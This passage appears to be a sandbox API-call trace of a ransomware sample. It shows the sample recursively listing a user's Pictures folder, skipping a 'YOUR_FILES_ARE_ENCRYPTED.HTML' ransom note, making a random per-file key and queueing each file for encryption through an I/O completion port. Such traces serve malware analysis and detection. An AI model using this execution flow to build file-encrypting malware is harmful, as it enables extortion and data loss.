(pszPath="7g14lH7VgBRylj.gif") returned=".gif" [0168.205] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\7g14lh7vgbrylj.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0168.206] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=92797) returned 1 [0168.206] GetProcessHeap () returned 0x270000 [0168.206] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759458 [0168.209] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BA") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A0") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FC") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="1C") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="67") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="47") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="28") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="68") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DA") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="98") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="84") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="6A") returned 2 [0168.209] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="58") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="EA") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DB") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C9") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3E") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AF") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="83") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="06") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C7") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="98") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F0") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F3") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2A") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1F") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="2B") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7F") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B8") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="26") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0E") returned 2 [0168.210] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="26") returned 2 [0168.211] lstrcpyW (in: lpString1=0x776950c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif" [0168.211] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7759458, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.211] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759458, lpOverlapped=0x7759458) returned 1 [0168.211] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bf96f0, ftCreationTime.dwHighDateTime=0x1d7d80e, ftLastAccessTime.dwLowDateTime=0xf7a940d0, ftLastAccessTime.dwHighDateTime=0x1d7e647, ftLastWriteTime.dwLowDateTime=0xf7a940d0, ftLastWriteTime.dwHighDateTime=0x1d7e647, nFileSizeHigh=0x0, nFileSizeLow=0x100d9, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="F1G7hM3SClglcU5GIl12.bmp", cAlternateFileName="F1G7HM~1.BMP")) returned 1 [0168.211] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\F1G7hM3SClglcU5GIl12.bmp") returned 65 [0168.211] lstrcmpW (lpString1="F1G7hM3SClglcU5GIl12.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.211] PathFindExtensionW (pszPath="F1G7hM3SClglcU5GIl12.bmp") returned=".bmp" [0168.211] lstrlenW (lpString=".bmp") returned 4 [0168.211] PathFindExtensionW (pszPath="F1G7hM3SClglcU5GIl12.bmp") returned=".bmp" [0168.211] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63dbf920, ftCreationTime.dwHighDateTime=0x1d7da48, ftLastAccessTime.dwLowDateTime=0x74c23a0, ftLastAccessTime.dwHighDateTime=0x1d7db61, ftLastWriteTime.dwLowDateTime=0x74c23a0, ftLastWriteTime.dwHighDateTime=0x1d7db61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="iV8-Qr39PzJA__E0", cAlternateFileName="IV8-QR~1")) returned 1 [0168.211] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0") returned 57 [0168.211] GetProcessHeap () returned 0x270000 [0168.211] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76302f8 [0168.211] lstrcpyW (in: lpString1=0x76302f8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0" [0168.211] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\*" [0168.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63dbf920, ftCreationTime.dwHighDateTime=0x1d7da48, ftLastAccessTime.dwLowDateTime=0x74c23a0, ftLastAccessTime.dwHighDateTime=0x1d7db61, ftLastWriteTime.dwLowDateTime=0x74c23a0, ftLastWriteTime.dwHighDateTime=0x1d7db61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0168.610] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63dbf920, ftCreationTime.dwHighDateTime=0x1d7da48, ftLastAccessTime.dwLowDateTime=0x74c23a0, ftLastAccessTime.dwHighDateTime=0x1d7db61, ftLastWriteTime.dwLowDateTime=0x74c23a0, ftLastWriteTime.dwHighDateTime=0x1d7db61, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.611] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8834f90, ftCreationTime.dwHighDateTime=0x1d7d8bf, ftLastAccessTime.dwLowDateTime=0xe2a43820, ftLastAccessTime.dwHighDateTime=0x1d7e1f1, ftLastWriteTime.dwLowDateTime=0xe2a43820, ftLastWriteTime.dwHighDateTime=0x1d7e1f1, nFileSizeHigh=0x0, nFileSizeLow=0x164f2, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="4nlDuVj.gif", cAlternateFileName="")) returned 1 [0168.611] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif") returned 69 [0168.611] lstrcmpW (lpString1="4nlDuVj.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.611] PathFindExtensionW (pszPath="4nlDuVj.gif") returned=".gif" [0168.611] lstrlenW (lpString=".gif") returned 4 [0168.611] PathFindExtensionW (pszPath="4nlDuVj.gif") returned=".gif" [0168.611] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\4nlduvj.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.612] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91378) returned 1 [0168.612] GetProcessHeap () returned 0x270000 [0168.612] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0168.615] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="02") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D7") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="1D") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="8E") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="03") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="D4") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="DD") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B6") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="6B") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="51") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F5") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="B3") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="6D") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="86") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A3") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B5") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F6") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="1B") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="9C") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="22") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A3") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="4F") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="B4") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="3A") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="DF") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B7") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="DE") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="ED") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="52") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="20") returned 2 [0168.616] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="33") returned 2 [0168.617] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6C") returned 2 [0168.617] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\4nlDuVj.gif" [0168.617] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.617] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0168.632] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xff588e90, ftCreationTime.dwHighDateTime=0x1d7e24a, ftLastAccessTime.dwLowDateTime=0x4aeddb50, ftLastAccessTime.dwHighDateTime=0x1d7e267, ftLastWriteTime.dwLowDateTime=0x4aeddb50, ftLastWriteTime.dwHighDateTime=0x1d7e267, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c760c2, dwReserved1=0x0, cFileName="91wJYhTsR", cAlternateFileName="91WJYH~1")) returned 1 [0168.632] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR") returned 67 [0168.632] GetProcessHeap () returned 0x270000 [0168.632] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0168.634] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR" [0168.634] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\*" [0168.634] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xff588e90, ftCreationTime.dwHighDateTime=0x1d7e24a, ftLastAccessTime.dwLowDateTime=0x4aeddb50, ftLastAccessTime.dwHighDateTime=0x1d7e267, ftLastWriteTime.dwLowDateTime=0x4aeddb50, ftLastWriteTime.dwHighDateTime=0x1d7e267, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0168.634] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xff588e90, ftCreationTime.dwHighDateTime=0x1d7e24a, ftLastAccessTime.dwLowDateTime=0x4aeddb50, ftLastAccessTime.dwHighDateTime=0x1d7e267, ftLastWriteTime.dwLowDateTime=0x4aeddb50, ftLastWriteTime.dwHighDateTime=0x1d7e267, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.635] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb98690, ftCreationTime.dwHighDateTime=0x1d7d825, ftLastAccessTime.dwLowDateTime=0xfa86b370, ftLastAccessTime.dwHighDateTime=0x1d7dd21, ftLastWriteTime.dwLowDateTime=0xfa86b370, ftLastWriteTime.dwHighDateTime=0x1d7dd21, nFileSizeHigh=0x0, nFileSizeLow=0x25f6, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="2OyC.png", cAlternateFileName="")) returned 1 [0168.635] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png") returned 76 [0168.635] lstrcmpW (lpString1="2OyC.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.635] PathFindExtensionW (pszPath="2OyC.png") returned=".png" [0168.635] lstrlenW (lpString=".png") returned 4 [0168.635] PathFindExtensionW (pszPath="2OyC.png") returned=".png" [0168.635] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\2oyc.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.636] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=9718) returned 1 [0168.636] GetProcessHeap () returned 0x270000 [0168.636] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.640] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="8A") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="2B") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="B7") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="7E") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="23") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="C5") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="4E") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="42") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="60") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="7A") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="D5") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="C7") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="AE") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="CE") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="17") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="DD") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="46") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="0D") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="C9") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="E4") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="FE") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="6D") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="FD") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="4E") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="8D") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="D1") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="04") returned 2 [0168.640] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="0C") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="CB") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="56") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="45") returned 2 [0168.641] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="27") returned 2 [0168.641] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png" [0168.641] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.641] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0168.648] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b61ac80, ftCreationTime.dwHighDateTime=0x1d7e349, ftLastAccessTime.dwLowDateTime=0x81d9dfb0, ftLastAccessTime.dwHighDateTime=0x1d7e59b, ftLastWriteTime.dwLowDateTime=0x81d9dfb0, ftLastWriteTime.dwHighDateTime=0x1d7e59b, nFileSizeHigh=0x0, nFileSizeLow=0x183d5, dwReserved0=0xff6c98d4, dwReserved1=0xffffffff, cFileName="FaEqNR6CU6.gif", cAlternateFileName="FAEQNR~1.GIF")) returned 1 [0168.648] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif") returned 82 [0168.648] lstrcmpW (lpString1="FaEqNR6CU6.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.648] PathFindExtensionW (pszPath="FaEqNR6CU6.gif") returned=".gif" [0168.648] lstrlenW (lpString=".gif") returned 4 [0168.648] PathFindExtensionW (pszPath="FaEqNR6CU6.gif") returned=".gif" [0168.648] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0168.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\c1jo8j6\\iv8-qr39pzja__e0\\91wjyhtsr\\faeqnr6cu6.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.649] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=99285) returned 1 [0168.649] GetProcessHeap () returned 0x270000 [0168.649] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0168.650] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="83") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="79") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="E4") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="33") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="89") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="DE") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="39") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="E1") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="E3") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="C2") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="11") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="A2") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="ED") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="66") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="67") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="27") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="F8") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="15") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="DB") returned 2 [0168.650] wsprintfW (in: param_1=0x4ebd46a, 